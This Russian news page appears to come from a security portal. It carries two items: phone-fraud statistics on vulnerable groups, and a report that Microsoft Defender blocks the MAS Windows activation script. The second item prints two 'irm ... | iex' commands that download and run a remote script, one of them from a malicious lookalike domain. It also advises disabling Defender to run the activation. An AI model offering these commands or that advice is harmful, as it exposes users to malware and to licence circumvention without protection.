Женщины и молодежь наиболее уязвимы для дистанционного мошенничества

Женщины и молодежь наиболее уязвимы для дистанционного мошенничества

Женщины и молодежь наиболее уязвимы для дистанционного мошенничества

Согласно статистике, собранной Роскомнадзором, больше половины жителей России сталкивались с телефонным мошенничеством. Наиболее уязвимыми категориями перед аферистами категориями оказались женщины и зумеры (они же «поколение Z», родившиеся в 1995-2014 гг.).

Более половины (56%) опрошенных «Ренессанс страхование» россиян сталкивались с телефонными мошенниками, причем зачастую неоднократно. 18% опрошенных получали один звонок, 26% — два, а 12% — три.

Чаще всего жертвами мошенников, по данным Роскомнадзора, становятся дети, пожилые люди и те, кто оказался в сложной материальной ситуации. Мошенники пользуются тем, что пожилые люди испытывают дефицит общения и при этом слабо разбираются в современных технологиях.

Поэтому они легко принимают «помощь» от мошенников, например, устанавливая вредоносное приложение под видом официального сервиса. Злоумышленники также часто эксплуатируют готовность пожилых людей помочь правоохранительным органам.

Дети и подростки нередко попадаются на уловки мошенников из-за недостатка жизненного опыта и слабого контроля за банковскими картами, оформленными на детей со стороны родителей. Наиболее простой схемой в отношении них является мошенничество с цифровым контентом: злоумышленники предлагают различные игровые предметы по заниженным ценам, а затем исчезают.

Детей вовлекают в разного рода дропперские схемы. За последние два года количество подобных инцидентов выросло в 74 раза. Такую статистику привел вице-президент Сбербанка Сергей Лебедь на слушаниях в Совете Федерации.

Но очень часто детей и подростков мошенники вовлекают в дропперство, что называется, «втемную», под видом помощи бизнесу или удаленной работы. Как прокомментировали для «Известий» в Ассоциации развития финансовой грамотности (АРФГ) при Банке России, в дропперство мошенники также активно вовлекают бывших воспитанников детских домов и людей, оказавшихся в тяжелой финансовой ситуации, а также одиноких и инвалидов. Все они рискуют столкнуться с юридическими последствиями, включая возмещение ущерба.

Самые уязвимые абоненты, по оценке компании PRO32 — те, кто спешит, загружен делами или занят важной беседой. Такие люди, полностью сосредоточенные на своем занятии, испытывают раздражение от внезапного звонка и, стремясь как можно скорее завершить разговор, иногда выдают важную информацию или устанавливают вредоносное приложение.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru